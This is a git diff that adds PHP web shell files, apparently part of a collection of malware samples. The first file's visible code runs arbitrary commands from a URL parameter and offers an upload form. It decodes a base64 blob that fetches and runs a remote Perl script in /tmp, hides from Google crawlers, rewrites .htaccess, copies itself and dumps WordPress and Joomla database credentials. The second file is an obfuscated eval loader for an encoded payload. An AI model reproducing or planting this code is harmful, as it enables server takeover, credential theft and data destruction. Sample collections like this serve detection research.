++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO3dnZXQgJy4kdXJsLi
+
+cgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY2QgL3RtcDtjdXJsICcuJHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4d
+
+DtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAt
+
+ZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXN
+
+zdGhydSgnY2QgL3RtcDtmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO0dFVCAnLiR1cmwuJz
+
+twZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ3JtIC1yZiBpbmRleC5waHAuKicpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHBhc3N0a
+
+HJ1KCdybSAtcmYgcm9iKi50eHQqJyk7DQp9DQo/Pg==";
+        $code2 = base64_decode($code);
+        $myfile = fopen("pl.php", "w+");
+        fwrite($myfile, $code2);
+        fclose($myfile);
+    }
+    private function check($tipe) {
+        if ($tipe == "cmd") {
+            $result = 0;
+            if (function_exists('passthru')) {
+                $result = "passthru";
+            } elseif (function_exists('system')) {
+                $result = "system";
+            } elseif (function_exists('exec')) {
+                $result = "exec";
+            } elseif (function_exists('shell_exec')) {
+                $result = "shell_exec";
+            }
+        } else {
+            $result = "linux";
+            if (PHP_OS == "WINNT") {
+                $result = "windows";
+            } elseif (PHP_OS == "Linux") {
+                $result = "linux";
+            } elseif (PHP_OS == "FreeBSD") {
+                $result = "freebsd";
+            }
+        }
+        return $result;
+    }
+    private function getForm() {
+        $this->form();
+        if (isset($_GET['start'])) {
+            echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br/><input type=hidden name=submit><input type=file name=userfile 
+
+size=28><br><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";
+            $this->processForm();
+            $this->cmd();
+        } else {
+            $this->cmd();
+        }
+    }
+    private function form() {
+        if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'google') !== false) {
+            header('HTTP/1.0 404 Not Found');
+            echo "<h1>Error 404 Not Found</h1>";
+            echo "The page that you have requested could not be found.";
+            exit();
+        }
+        $safe = @ini_get('safe_mode');
+        $secure = (!$safe) ? "SAFE_MODE : OFF roin" : "SAFE_MODE : ON roin";
+        echo "<body style='background:#610680;
+        color:#fff;
+        font-family:monospace;
+        font-size:13px;
+        '>";
+        echo "<title>Touched By roin</title><br>";
+        echo "<b>" . $secure . "</b><br>";
+        $cur_user = "(" . $this->user . ")";
+        echo "<b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
+        echo "<b>Uname : " . php_uname() . "</b><br/>";
+    }
+    private function processForm() {
+        if (isset($_POST['submit'])) {
+            $uploaddir = $this->pwd();
+            if (!$name = $_POST['newname']) {
+                $name = $_FILES['userfile']['name'];
+            }
+            move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
+            echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" : "Success Upload to " . $uploaddir . $name;
+        }
+    }
+    private function pwd() {
+        $cwd = getcwd();
+        if ($u = strrpos($cwd, '/')) {
+            return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd;
+        } elseif ($u = strrpos($cwd, '/')) {
+            if ($u != strlen($cwd) - 1) {
+                return $cwd . '/';
+            } else {
+                return $cwd;
+            }
+        }
+    }
+    private function cmd($cmd = false) {
+        if ($cmd) {
+            echo '<pre>' . $this->exe($cmd) . '</pre>';
+        } else {
+            if (isset($_GET['q'])) {
+                echo '<pre>' . $this->exe($_GET['q']) . '</pre>';
+            } else {
+                echo ($this->os == "windows") ? '<pre>' . $this->exe('dir') . '</pre>' : '<pre>' . $this->exe('ls -la') . '</pre>';
+            }
+        }
+    }
+    private function exe($cmd) {
+        $res = '';
+        if ($this->type == "exec") {
+            @exec($cmd, $res);
+            $res = join("n", $res);
+        } elseif ($this->type == "shell_exec") {
+            $res = @shell_exec($cmd);
+        } elseif ($this->type == "system") {
+            @ob_start();
+            @system($cmd);
+            $res = @ob_get_contents();
+            @ob_end_clean();
+        } elseif ($this->type == "passthru") {
+            @ob_start();
+            @passthru($cmd);
+            $res = @ob_get_contents();
+            @ob_end_clean();
+        }
+        return $res;
+    }
+    private function setPatch($user, $data, $lock, $path, $force) {
+        $create = 1;
+        if (!$force) {
+            if (in_array($user, $this->access)) {
+                $create = 0;
+            }
+        }
+        if ($create) {
+            if ($lock) {
+                $i = 'deny from all' . PHP_EOL;
+            } else {
+                $i = '<Files ~ "(?i).(zip|rar|php|php.*|phtml|gif|png|phpgif|asp|asp.*)$">' . PHP_EOL;
+                $i.= 'deny from all' . PHP_EOL;
+                $i.= '</Files>' . PHP_EOL;
+            }
+            if (is_array($data)) {
+                foreach ($data as $k) {
+                    $i.= '<Files "' . $k . '">' . PHP_EOL;
+                    $i.= 'Order Allow,Deny' . PHP_EOL;
+                    $i.= 'Allow from all' . PHP_EOL;
+                    $i.= '</Files>' . PHP_EOL;
+                }
+            } else {
+                if (!empty($data)) {
+                    $i.= '<Files "' . $data . '">' . PHP_EOL;
+                    $i.= 'Order Allow,Deny' . PHP_EOL;
+                    $i.= 'Allow from all' . PHP_EOL;
+                    $i.= '</Files>' . PHP_EOL;
+                } else {
+                    $i.= '<Files "1x.php">' . PHP_EOL;
+                    $i.= 'Order Allow,Deny' . PHP_EOL;
+                    $i.= 'Allow from all' . PHP_EOL;
+                    $i.= '</Files>' . PHP_EOL;
+                    $i.= '<Files "string.php">' . PHP_EOL;
+                    $i.= 'Order Allow,Deny' . PHP_EOL;
+                    $i.= 'Allow from all' . PHP_EOL;
+                    $i.= '</Files>' . PHP_EOL;
+                }
+            }
+            if (is_array($path)) {
+                foreach ($path as $k) {
+                    $file = fopen($k, "w");
+                    fwrite($file, $i);
+                    fclose($file);
+                }
+            } else {
+                if (!empty($path)) {
+                    $file = fopen($path, "w");
+                    fwrite($file, $i);
+                    fclose($file);
+                } else {
+                    $file = fopen(".htaccess", "w");
+                    fwrite($file, $i);
+                    fclose($file);
+                }
+            }
+        }
+    }
+    private function setDB($file) {
+        $read = file_get_contents($file);
+        if ($read) {
+            echo $read;
+        } else {
+            echo "Unable to open file";
+        }
+        exit;
+    }
+    private function setClone($path) {
+        if (file_exists($path)) {
+            @unlink($path);
+        }
+        $source = $_SERVER['SCRIPT_FILENAME'];
+        copy($source, $path);
+    }
+    private function joomlaDb() {
+        $p1 = "../../../../../../../";
+        $p2 = "../../../../../../";
+        $p3 = "../../../../../";
+        $p4 = "../../../../";
+        $p5 = "../../../";
+        $p6 = "../../";
+        $p7 = "../";
+        $j = file_get_contents($p1 . "configuration.php");
+        if (!$j) {
+            $j = file_get_contents($p2 . "configuration.php");
+            if (!$j) {
+                $j = file_get_contents($p3 . "configuration.php");
+                if (!$j) {
+                    $j = file_get_contents($p4 . "configuration.php");
+                    if (!$j) {
+                        $j = file_get_contents($p5 . "configuration.php");
+                        if (!$j) {
+                            $j = file_get_contents($p6 . "configuration.php");
+                            if (!$j) {
+                                $j = file_get_contents($p7 . "configuration.php");
+                                if (!$j) {
+                                    $j = file_get_contents("configuration.php");
+                                }
+                            }
+                        }
+                    }
+                }
+            }
+        }
+        echo $j;
+        exit;
+    }
+    private function wpDb() {
+        $p1 = "../../../../../../../";
+        $p2 = "../../../../../../";
+        $p3 = "../../../../../";
+        $p4 = "../../../../";
+        $p5 = "../../../";
+        $p6 = "../../";
+        $p7 = "../";
+        $w = file_get_contents($p1 . "wp-config.php");
+        if (!$w) {
+            $w = file_get_contents($p2 . "wp-config.php");
+            if (!$w) {
+                $w = file_get_contents($p3 . "wp-config.php");
+                if (!$w) {
+                    $w = file_get_contents($p4 . "wp-config.php");
+                    if (!$w) {
+                        $w = file_get_contents($p5 . "wp-config.php");
+                        if (!$w) {
+                            $w = file_get_contents($p6 . "wp-config.php");
+                            if (!$w) {
+                                $w = file_get_contents($p7 . "wp-config.php");
+                                if (!$w) {
+                                    $w = file_get_contents("wp-config.php");
+                                }
+                            }
+                        }
+                    }
+                }
+            }
+        }
+        echo $w;
+        exit;
+    }
+    private function delete($file) {
+        chmod("./", 0755);
+        chmod("../", 0755);
+        chmod("../../", 0755);
+        @unlink($this->pwd() . $file);
+        $this->exe('rm -rf ' . $file);
+        $this->exe('del ' . $file);
+    }
+}
+new roin();
+?>
\ No newline at end of file
diff --git a/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php b/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php
new file mode 100644
index 0000000..d68a6bd
--- /dev/null
+++ b/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php
@@ -0,0 +1,209 @@
+<?php function aX0grtyu456RtO8($a, $b) {
+    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
+    if ($a == "srwertxcbtytyu//..huytytryurt") {
+        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
+        return $qwery45234dws($b);
+    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
+        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $owe342wfbjdewqre34($b);
+    } else if ($a == "azsewqwqwez/...derwewr") {
+        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
+        return $rt4534fhghj5($b);
+    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
+        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $as346hgjkhfg($b);
+    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
+        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
+        return $zsweqwq4546dgh($b);
+    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
+        return eval($b);
+    }
+}
+eval(str_rot13(gzinflate(str_rot13(base64_decode("vZVYeNtAFIX3hf4HI7xjIOg5I9kYL0XST+qQTze1WsHI8czoenYeSZzg/97r9BEnugUtVyUtpHvR6JzvHlYqiXix38SDd+53JoqE0PCj+DAeDavL4e7idkv6AYGD6ocITTMu2Jp6hBeMZ7mP1aESZfRF20hchnHdyG3TyJG1Kq+Lq/art4pxabV3l8tP88We3C8/Jelpkc8/3zRfYQ73t+W4XRU8+tZe12rWBXnTvQIBs5nFTCaZyOudKECb49i2VuBZsCJuwgJsW+gXhILCJuOzN3ef/PHR7tQmVS3qSvNVtxZrxymTIm7x4LWaEfCbHuWBy8FiO7USWUMS0ihH2jiOVpJ9btvfHXpZe7KzySQsnqld28h5y+Ci48nzEa2ILj9AtfbyhPJAuAUhRWb71TxRH6alr9+/rPd0Nl20yICqklATaUxP1uxTT/4yaZoME4QGURl6TfpCZoYxUflwZk+egaD2Xyic28D85240nijntIF/m6s6SrXSEjIbNFOfVUc8IKHR7YNEuptBLG6YJIQYNn2KAOvH8H/n6xwLT7aENiW8RGgaFww+d/VNFzo5AS1sJiFm0A4berpVsZcM4eJuIcRRI/f6fceGBO4cwngrdcDgFhKEtNHp7jF+NAmFQm6q09pkgFSRPCP5tZxZq8PPNY7T9++Gcn6X5e5csFvXG0JNarHIq9IdzAbWm5+XNf0B")))));
+$zxAwx0XtrY0189j0KKxaz0("ax4564365dgvbmnmhu56fgvgvc//gygyugu", $zxAwx0XtrY0189j0KKxaz0("ax6789f/////....sfcxfcfge4653dhg", $zxAwx0XtrY0189j0KKxaz0("zs3454sdfcvnyrertc_gygu", $zxAwx0XtrY0189j0KKxaz0("azsewqwqwez/...derwewr", $zxAwx0XtrY0189j0KKxaz0("cftrt546576fgh//huuiy..\/ghhj", $zxAwx0XtrY0189j0KKxaz0("zs3454sdfcvnyrertc_gygu", $zxAwx0XtrY0189j0KKxaz0("ax6789f/////....sfcxfcfge4653dhg", $zxAwx0XtrY0189j0KKxaz0("srwertxcbtytyu//..huytytryurt", "==wB7n/77foqj+6F0VSqyWxPL9xr29z2yexDRav63vIHxrn4frZ7edkJRqjycf+rfBBgGo7N87+q
+SQn04GCHnHMao6c77x3qo8/2i1L69snu1eCBukR2YbS6dGNgYvXGHzrdQJ3QvNLJXV+IT4rtplEl
+nN2b/bPDRpX9uqc4iu8bYfYduq64+6b/9mSi/mr9tqIje7ptois70Dl4/ky8Ptqp79///zn+yru/
+yKhemfVuuG3fwdLIqDcTTLoS0Emxv7Fpvl5qX7R/WVyZuVXmP0sTf/zErkO2o5NNE31s938unr7u
+meFobpzBIvVsIbmDFN9Rd8mQRxrkGjrnFmzfZ/LvbJb+O5rPaf1ppe/Jx5u1b+sT6K+PkumCmuSV
+5Lepz5pr07A5lLrP7JeJ6s/K6Xgr2RxBtx/dYY+Qsb3r5pN2cfp2fHAopWyd5i1+O0ffpirOAykH
+Y0+E7T+w+m411j7my7zZ6czBCz+J8ZeQAA41n3hrx0Wq2t+D7JPuy8+Z7Zt/Fbtv1olTOndqbf+e
+VcdeYcWzYqYO+eObhe7G9N0lXND3qHXzpEf1jMqR568Xkef37NxN/y0+Wrt9/P238+OnTVt7PjZ2
+7KXnjmTFccm+nXWuxw99Nj184388O2ml71btui+2L7RjBb28qnOezSoS7esSrn9s0PUH5t5G4UtL
+9W7s2KfLntfZGF/55bjzp+jcZszdrwZe2H/5myxeuGXkco8rky62NGX8PomVNiTOx1xrbimx64mT
+0Zvpju3ET27Ywkb6n39Lenrdb0Jqy2vjVVmimMlu/id7fKS2SGLeoygubYZWSz9qtHR6XGKhl1nW
+LhxuZ4da4jzYEhZ2XwC+L8C9CTGnSQWNMDvtTlRb7wsuA+WC5tPLrI5bntlZeBqJZK5vZGzWLBQl
+pHenjjum2egW3f1lB6CRJ1rMW01kLXp12Vb9fihxcbNO9i8Qi1W/c7J9So7nPailFAdirmjaZtcM
+RNosSP/LhR8LnZW7qDXIRcA018T7SxdvyzYVHq337cMPMrPRoO5rrokWK3WHkQU4Hg+Lgu4s11D+
+w2HHJSChhxc+sLB4DKD7+FrAzJyrcvRut1qjAY4hCrucqXx7DSg98FE9IaUfQCxOJNfkz23jFYZK
+rhSVF3iDlmrgc/b1ZZICxg/quUzgKJwPUgbooDT926QuGKTwaIa+EdQc6aMf4zbLFxwxCnG7yW4k
++56GmEyESkHxXRUNoUWUml7OcTc3XvQ6UGtAc0Oa5If+r2CCeeoka5/ShOu1ou5+UGFepn3LFlxd
+NBCmOhN8afuuamlNbzbRQuebSWqnK8YjoYmeYWgnySsJGvwrRLi/0Qcpt1+rGmL+EZM0vmycSNwH
+Ccpc2reSsNziiDP0bx+XIIH/k7cEIC0hqrm9ZPTes+5pCfElDnQ37n5OHzoio9y7lmBNk2vR2B0u
+BRwHaOgXKGm0C/SohzURn5v4TAVzsvl7Y5IA19h5/SoELbT+Or8YNr+nXlHtTcRnJhVlrXCvO+bO
+2VMu08q8DyFiQ73eAlU1J9exa0TClYGybIzJHTjO5Jl82ZTVLUaT+qSLd4G4g8Cq7Jm/PtHr6tBh
+VwbQJsAL2v/FemtzVNEOztklPgcYIeQj1OYOFbr7UmA+5J45iiHMROz/LdKeT5tx2SpfNmZ5m3g+
+PEo1k+nmLxZ/POlR+7k1gvb7OqRp2sMnEYql6Ajbr8ic7U7goq4fhy6jtBoA+XucfOE5iMCCFuqc
+m1o/4cuepGef67n3RGk+1xib51RkXVpYsE1nPF/BfzkLx0PN+s7K99WoY2/P/zwlLoRbhJAfKaVZ
+4QrLx295h0N+dEkZ73/XY3j5z2VnXQ4K5hGGRlwbvPmgTJ9RnZVd4zZ+IZPUB6baLlaWnS25Dxm/
+BXdeZ/Qp3M9IttqsaDGz9nKn1FaaePeDnAfl7lvAAQLp/U1S3QI7FQownpRZm/G0dtXUoWdUVBxa
+Uat7wZ9yGmMMqKCbrCeFn2Wcm7Cws7+8JwbhOo64guEFVrHzAXp/M0HHuNz4QYU+yapqjoPL5Tlv
+A53JKNIrDkKj6Sg3IjFCzigPayRK/vasHuf3vYNoRWhowjBLaAF74j69t/6lmWL1gHHN1v8qMLVJ
+kf8LlObrh6p/VhQ49pM+9GTfvrXHN5ZKI5i0d20a/6B9ofK9YbYOB0uJM/pLCQXBPV8cPCnXzRJb
+S6f+kTSCP+KPlfxd2e2S+Yp18cgHUy6ePzRsQ4WzF4rxjxyG8RYlv1TszVjrTrOQ92mMm/P7fHuC
+mWsdEFpL9LLcg01JvQzEkRujPdbpNb4N2zS5CxS/exbRWSkM8Xg4f/gMbmgeUfhDHKvtnD/XyTVA
+2YdwZp6jNYDgkA7z5sQiP2NMdggn4RAAR4F/c5Jx9Oy+erPPw1eObp9kyrAb4Y8np2ZwBKjSngOv
+XxZF7T3scSTI2t+zYIpE5zEUq+Cfsc9ttHH/vqcoHsPdc/8iKScEbfMGDRfzFmNVamv1vGcI2jkE
+AJ6J8C1OVByhvZ1N6n/q1dRmRehVlIdfjzI412KUb9UR+s01gvwVo/7gUR2SfSG1zrYykNscqVdz
+CQF0NV/XoB9bwry8I5nufF6Jo7B9yiJ7AKv9dd3m2gb/IYJQYPp1n9Z/cdt0JO1J2VdN/VHoNCA3
+76FHxj06/1OqFF15lbLGFTa1KbydiLGYSh5FhXCXDGKFXu+wVLoMr4vwrZG5C8KQv9z/FEDNLjMe
+Sbjzy4IQ3LZbIcEqYzM2W6WrINv63UNEEwuDlG5lwv2R/oDghZVyO1kOP/ntcBErEiNftYWb3shD
+m6eBMKT6bHP8m3aF1y6NWZ1eNaF+2HQlUjDR+wc/MX52rVP4pkRRDkwd+4ZHheXGaJa/jWCwr5fw
+Z5ID8rxsy5dZ/B2S2XB8vAMZMhMp9zF+GzPcFJPCvsUF5hwZsS8P+iAqyNnIDsPCJVyjWq8mmc81
+feqyktM2OCing4TGWnDnuUpcWibmxEmByqOB7VyISXyGLyuauD5XYKdW5bvqLrm+TCgi3se3pv3o
+mLIz5Sdg86p6Hw2qHgPOj3Nh/HwcEpRqvU9yFZP+FfdKGpldSQfmgS6hZt55bSYPWK51KOEcC4Uq
+eerZtvHw1j2Swse9XDptyBrdiLvtaheJ2+P/nwEKBJYNnr3PWVBdUcWw2wMuiN/B5lIPcBfLn3eZ
+Fj9XB2M7DU+1wzIedqufqa391sxdPEeji+jswHx6WDOd9xsrQfptuJpqARfj3UYP7T62L/3ud3mX
+ro5iTva3vg5/PCUYttkBpK/uWxV/W1Y56/+4hPPfwpPcabS4DzR6qwn7B0gNqg9crROwNRIv6vVz
+UlaJJAyjB6URCWALNBvVEgjQn3Z+NUBHTfk4VC/qoxfEtzUvpz69YPrI1B+vEzuy8sp6biyR/+HW
+KoB/uEWCnS+9drvG5tttvWVLXLFdx7OK0XGhITTbUn4XGzV8+h6KFauNpxm/gtsfW+Vo7ya+R3N/
+QlFn3SNoKoW1Q1Ao/1AJFdz1/qX8+oHv4J2WF9CjKius1jbmEyqpV6NufbEuumRdgFrs6v5RW5xX
+4E9NYHT4gJ/GvV3bdeP5SiQn+RPPGwS2nX9EXMd+2Bknq9tApoHkucSY60KcaPBF5NjAPwWctct1
+3W5/mJpRvkVeolVmaKVEIwwLfDmZ1hAo6Y4KBHN0TGJ0PPT5Xe6QT1vKaonHzjLJ686Kh4f61u+W
+pZS+sXi4ZUerA7rhqzd9kPF7IOKQO68kNnOPUk6RkR/HtqAUg3mVzDy8np/w+VD2hFJkmvvqMzy0
+DP3Oy+HuXMy+QZ0t4yU+4K8KIVFXBDWrZnot3lyfB0skIv0Y6fSXyFXblb8z+KUzlBsUKNGrTFyW
+86EhkG+4sVdtBXeVivWrZe3uz/2SXbXgrvlhVQ+O6uRIcCrB9skJ+OdIAGPbyFPk7R1mQGTjKy6v
+ZYvjGK/2o4E/pGPPYgYWSw808pxUBPWjfT/8tiIAQZFtUgXJtM2AHAlh+HQ2oEXmFDxa2LnM1vJU
+zJcUMI+FFSNrbCqRUZo+rw4I7V6nVFX2gweB1AevbFKaTma0GSR7a+TKV76rIfSOCx+woqqIxzG+
+76+LOyqfA2t9DVhaUezenXPlM0Ep12hvRd1QNrEQGrG9vK+iAGGpbBt+0mPjTPR/2S6pDiqwfGBV
++HY5dfkRnkNpCMdtoS4pJ+mmCGDuoc5rX9DvE8fFxAu/RTU5EiZagjHI3UKNvHqWmgKsmst6laPw
+mtZ3mlV/SmAkFGxk7O9f8+lT/xql1wQqj/2JFH12CbjcuRduqjbbyMoSS5fgPT0UX/m4BB2gbVcc
++BQZ/5Hz0ezS01SuHFde1WIJ1ikZwhEe6wd6cMpFB/pyRtL0MTV/zw9flXJeiM7mkr9uQvk3VbOa
+jsUIcvZeQFxx7CPYlpExwf10RMZgt7TOI9mYUTgi8G7Qyk46obrZLcDw3N4dF4+l9JvuYHMvdzID
+xfdv2HPcZ1298qMOREH+DsEYpTD6dw7eBgVMxEXW65OPT3XceYFsHg2ZKMjAxndSTutmxsB5tOM0
+YD0wcKYnyUlQ4KkLIknJTtRCmf7wFp/hhlqoSjq1VKfJvCbOIaZQM7RG+2qXmk8BYHqffAo7jGiV
+6UeRaWxlNElq/1OldKOkXgT5Cq5HnwoarQpT1DiNTj1NE/nTfjJcNCLycoZwBHiz9KA8tk6pY77+
+tUeJ7YOKLM9l8ecbnMMpNzJ0I2y7TelDdlejJuAPTLCTf8pgK/8PaCkCJKRnkzVmg2szK7kv38GO
+8yHYLE86Tdnfj5z7fyEPTHvJKyVanihBTq+XeHUKOyc/orzr7wC/kx2I94lpzXCjaWOgZlhcl+/p
+JOTFeyom2q3IlN2ptrFe2EYofWbyVCBe15lMKM1u0+BbZTu36BSEVK8l7oxSPFiNHBthlyWk3qGv
+LLSUQbdLjRpCzCZY70d6XFVvvLMWQnzMChWC7+AnR3+4p6o8fTtcrLnwzn7OOm4XU8NHvvtcdWrW
+4nlV+8vldDWSfTZv4kYuru7gwaZ+L2IJv5VEBw6fkvI0PZXcMRmqYyCUPS6LM2WfM+OXz68JFll8
+JbYUmG7QHs6Aq6BbWDmbtBHy0MQHt/ojfsJpqtAR6ghE21NJusUzlAPDS1UrDiizr9MHelU2HFRG
+IOKqT9iyYjgjzgWYiWoTGAY8CI/VFC6AJRefPop3GCut/VzkdlajaoOzXYzm/U3TWWaRl0k4vAcE
+q9OAnrBgHUtnyzDMrkWPm7SOtGO3wdHD+eGZK6sGv8TcWM3ni8FC+l+MU1XsnlQeKq9RSXtd1YEW
+nuZbxsrMxUf7wSV7ffHEAHs0zrRNT73WnsdcnckLoC7SWQvfLb/pdpSD8e83PLypPndK0zhEexrP
+GCNHcbColKRC4/qJsN5udqKQI5TuTBD3rbmLWsXBOi4z98bRGHipMjU3E/+9LZ/EYZ92qKLSCpb4
+vaEbw9ZizW0qJze72rMEpbIqzmSM3OqSGq2nPsXsz38HSd6LM7Pbm+VOh03DGoa3HoHyhOOn7gDz
+khfFSKy4e0EuPsNws78WvRnLZ9uMX5doZv3ZlKP5jmk9lxTj7trv0b3enKXcCjXUVe6imvZIBwvB
+3njh5CAvLGiNF2vV8GpO0n9vgI3nx9/qLMimeFBXEGZt5mB9Yv/MUpvTHZOlgw4JBXicgn2nclw1
+x9XbLJX+WhzrxJ+CabdxONx7f2NESX4FiK9/bC1quQOGqk/vCe29z3HQa1CpBVtWQindfNCZTglq
+xHhIVPlgHMGUqJFxcB3J1Wk4gvs8rIgJp/rOafD8z/qf2tshyRJCKU+fyHA9aMEJBF4J6Qo2wUB9
+o8CQVOq2Ocu7rY8O55IVWrNmr9iBR0BfC23AI6Fiyv38JP1Nr95bPbAimj8JteFs/Jw1szTeQ+KA
+Kw96oqo5oBtZBQg4RxYoB3SFl4Y+fL/WVqKqAPQE3urR2+H1tlt2FB7siDoJ0Tz7ipRsdRi6ekky
+2hAl4AecuUxksoYvNTeX8NnzsSm7iFRKr/81rvz9AeeGuF3i6QtnzCEgWfe2Oi9UUNb5eCQXwvgy
+/XRzf7ER8XeB4rLHjwmEn+7oWuJr0M4SU2pqo118telmHJqCuhfd0b5bERAtBy+U/ZhGRJCaydE8
+vurgvHa/Uvq7qH9SFNzFZg5fqVi/NywYE3CtrZpQhTeGccd135M+zSelTH9Si9DZVA2qlJAeIOSe
+DFgOeHlwSfIWAZRxZ3FYdqdw2/V3nFDD7erv8XHa3hIL7qYy7UrnGOpgtb1G74t4aXhJt1daR8S6
+3sBuOQ9QsPhWxgPGczaE0JtXP3cH10cCl6PBEl6Tgca/yth9JUoQHsr/g3a2TPSnuwV/P+0FXlPc
+DUNqvf78/rK4tt1+v74r083TV+1quxG0jJcgxCF+AFpDyyFxCMoY/tVR5bHruhmKIFkW2fPviQnI
+jrgVgZ5LNnlMSkTGTy/mS9SvzohTpEuwBOO8kzQ1ZvO55F0KGqALnE8kDdNrhXIDbhMr+kl6IvFE
+h2BMecW7hdHorfODQGgPgE2Y+yni3eqSuCgyDAByIlse9rnUW9N6h2a+1kPVAulHFPPNyTaC1mxB
+hIMw2c8GBfC3tzipEFyxIDqqz+MkAvewDuFvwGQEgbrNVrPmCDVTgyqIrhTC3rbBErzZyXwiCMK8
+gbgu3QPDBsLbN49+P/Oa4R2Lwy6ebwJoaUI+aZTmWKI3VCminLu9G65K9F7eA2Y3nUP86890M6Vm
+ee/vq+63PcqJz4opmWkUW8wqFpIankQwDHYym0t9OsO1CUf8gKCzZWLw4JewV5vqmIvsD80lnJ0t
+0Lf7/8dRd0sJfhTg9zV2Ut5lMo+2NjyF3fsrW21R/mwg9uKb8Vyfxif+JbJCXuOxQIzeLJURSTUO
+I6AXUC3ce9af9Z4gm7jwvVcxYUL+SBbBUHJbb1fenm0ZkeRI1aXUwFJK9G2dnKZHeC7GeIJ36mB9
+SaBfa/iNWwUPemaFAe67Iw97NZu0bzwKpu6HgKaYfYmhRQTg9ivpgcnjzQQiWSsnj3u2uFgtQo0b
+hPjJJlH3NVSzqLEpPSvKNSy3EBZThS4qqU05RtP7tkDkcEtoidzcy3A/iSSwdtqXuXb9BEeQmtvq
+O3B1K5rHZm/dJwnq5J8mTbDa/8wc2rPZH2dP8bSRKn++14wbJXjm86LKrckDLv8CfVrgcDT18YOY
+t9KHyTxHJpSzAOTdvz7U8E+fNqYd842remg2lbCNS3yn/277cGlw1PJ3TQi5CI4aaiulSfgNei5t
+lEWFDR8VvgIhqCJrCFWCbInkXsDyCPma29PPo3cL/oJWf+HFMhvW4SpS+e4aFJoonGoSXmdrrAHW
+//qN6MUiOuHcfJliCh+c4JTkQrJ7xrrxjIibQs3MKWs2WAsULDZLC3IBTCiwiFGYNs0bPAyRh2fJ
+y2H0da+4REmtsnb9vHqMC7PzhKyki0S16miRG/ffN//lh5sT90SleYc4G7Erxffzsy3rzPkcbq4t
+F8S4YtgiNbImDKNbSObd3osxE56V767O8pC+AxNg2kzHUYhtu9Y4QbnXFbGss/KbSCXzxr0bhmoX
+RRAh2+jAEV0CI6sZv536Aozjo5KyDmSrYnmHQe9b3tc39GLendenIvHYRe265WOlli5o9EVkuqNJ
+io8PRou1pvJog0tNsPHswSu3KXmXeNie1L/bnTbOgf+Z1q9FWO1MZs08XvYr7x4ZCTiQzODEb9yo
+wh+VBbXraiWuyzfpvjAIIaOI23i64Bu5Wm5LtsDIkvHnNK8dJ18d7aXbFJT1mOekDhmpnzB1huTw
+ny2NV7hGOB2Lh6YiItkXNNUpi2/hYkvlKKz8tupmyvqY0vfwnI1g1ck3qL3eJkH/NXGGUSqyvvmR
